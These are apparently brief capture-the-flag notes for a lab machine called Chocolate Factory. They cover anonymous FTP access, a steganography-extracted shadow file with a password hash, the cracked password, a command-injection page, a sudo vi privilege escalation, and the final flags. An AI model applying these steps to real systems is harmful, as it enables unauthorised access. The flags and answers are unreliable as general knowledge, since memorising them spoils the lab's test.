Chocolate Factory
rustscan
found port 21 ftp, port 22 ssh, port 80 http and more
ftp
Connected to 10.10.10.71. 220 (vsFTPd 3.0.3) Name (10.10.10.71:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||21456|) 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg 226 Directory send OK. ftp> get gum_room.jpg local: gum_room.jpg remote: gum_room.jpg 229 Entering Extended Passive Mode (|||52109|) 150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes). 100% |**************************************| 203 KiB 115.47 KiB/s 00:00 ETA 226 Transfer complete. 208838 bytes received in 00:02 (95.84 KiB/s) ftp> exit 221 Goodbye.
steghide
daemon::18380:0:99999:7::: bin::18380:0:99999:7::: sys::18380:0:99999:7::: sync::18380:0:99999:7::: games::18380:0:99999:7::: man::18380:0:99999:7::: lp::18380:0:99999:7::: mail::18380:0:99999:7::: news::18380:0:99999:7::: uucp::18380:0:99999:7::: proxy::18380:0:99999:7::: www-data::18380:0:99999:7::: backup::18380:0:99999:7::: list::18380:0:99999:7::: irc::18380:0:99999:7::: gnats::18380:0:99999:7::: nobody::18380:0:99999:7::: systemd-timesync::18380:0:99999:7::: systemd-network::18380:0:99999:7::: systemd-resolve::18380:0:99999:7::: _apt::18380:0:99999:7::: mysql:!:18382:0:99999:7::: tss::18382:0:99999:7::: shellinabox::18382:0:99999:7::: strongswan::18382:0:99999:7::: ntp::18382:0:99999:7::: messagebus::18382:0:99999:7::: arpwatch:!:18382:0:99999:7::: Debian-exim:!:18382:0:99999:7::: uuidd::18382:0:99999:7::: debian-tor::18382:0:99999:7::: redsocks:!:18382:0:99999:7::: freerad::18382:0:99999:7::: iodine::18382:0:99999:7::: tcpdump::18382:0:99999:7::: miredo::18382:0:99999:7::: dnsmasq::18382:0:99999:7::: redis::18382:0:99999:7::: usbmux::18382:0:99999:7::: rtkit::18382:0:99999:7::: sshd::18382:0:99999:7::: postgres::18382:0:99999:7::: avahi::18382:0:99999:7::: stunnel4:!:18382:0:99999:7::: sslh:!:18382:0:99999:7::: nm-openvpn::18382:0:99999:7::: nm-openconnect::18382:0:99999:7::: pulse::18382:0:99999:7::: saned::18382:0:99999:7::: inetsim::18382:0:99999:7::: colord::18382:0:99999:7::: i2psvc::18382:0:99999:7::: dradis::18382:0:99999:7::: beef-xss::18382:0:99999:7::: geoclue::18382:0:99999:7::: lightdm::18382:0:99999:7::: king-phisher::18382:0:99999:7::: systemd-coredump:!!:18396:::::: _rpc::18451:0:99999:7::: statd::18451:0:99999:7::: _gvm::18496:0:99999:7::: charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
john
==cn7824 (charlie) ==
gobuster
/home.php (Status: 200) [Size: 569]
we got command injection on this page
kali machine
Enter your name: laksdhfas congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' Keep its safe
if($uname=="charlie" && $password=="cn7824")
copy id_rsa to kali machine
ssh
priv esc
==(ALL : !root) NOPASSWD: /usr/bin/vi==
enter key found
print(mess)# python root.py Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Enter the key you found!b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
What is Charlie's password?cn7824
change user to charlie No answer needed
Enter the user flagflag{cd5509042371b34e4826e4838b522d2e}
Enter the root flagflag{cec59161d338fef787fcb4e296b42124}
[[Cyborg]]
Last updated